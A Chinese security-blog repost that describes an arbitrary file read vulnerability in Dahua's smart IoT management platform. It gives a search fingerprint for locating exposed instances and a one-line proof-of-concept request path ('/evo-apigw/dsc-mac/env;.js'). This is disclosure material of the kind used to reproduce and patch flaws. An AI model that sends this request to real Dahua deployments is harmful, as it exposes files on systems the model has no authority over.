大华智能物联综合管理平台存在env任意文件读取漏洞

admin
admin
admin
109443
文章
90
评论
2024年7月3日23:16:44评论8 views字数 171阅读0分34秒阅读模式
  1.  
1
漏洞描述
大华智能物联综合管理平台存在env任意文件读取漏洞,允许攻击者远程读取系统中的任意文件。

2
漏洞复现
首页

大华智能物联综合管理平台存在env任意文件读取漏洞

GET方式访问

大华智能物联综合管理平台存在env任意文件读取漏洞

3
网络测绘
body="*客户端会小于800*"

4
漏洞POC
地址/evo-apigw/dsc-mac/env;.js
 

原文始发于微信公众号(我吃饼干):【漏洞复现】大华智能物联综合管理平台存在env任意文件读取漏洞

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日23:16:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大华智能物联综合管理平台存在env任意文件读取漏洞https://cn-sec.com/archives/2914500.html

发表评论

匿名网友 填写信息